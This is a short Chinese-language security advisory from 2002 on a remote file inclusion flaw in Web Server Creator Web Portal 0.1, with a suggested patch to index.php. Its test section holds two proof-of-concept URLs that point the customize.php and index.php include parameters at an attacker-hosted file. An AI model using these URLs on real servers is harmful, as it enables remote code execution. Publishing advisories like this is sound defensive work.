Web Server Creator Web Portal远程文件包含注入漏洞发布时间:2002-11-25 更新时间:2002-11-25 严重程度:高 威胁程度:普通用户访问权限 错误类型:设计错误 利用方式:服务器模式 BUGTRAQ ID:6251 受影响系统 Web Server Creator Web Portal 0.1详细描述 Web Server Creator Web Portal 存在漏洞可以让攻击者包含一个远端服务器的二进制文件。 攻击者可以改变customize.php 和 index.php 中的包含路径,这可以让攻击者包含由其提供的一段PHP脚本,可以以WEB服务器的权限执行命令。 测试代码 http://[target]/news/include/customize.php?l=http://[attacker]/file.txt http://[target]/index.php?pg=http://[attacker]/badfile 解决方案 'Frog Man' <leseulfrog@hotmail.com>建议在index.php中进行修改,用 if (file_exists($pg.".php")){ require ("$pg.php"); }来代替require ("$pg.php"); 这一行。 相关信息 相关连接: http://online.securityfocus.com/archive/1/300974 http://webcreator.com02.com/ |
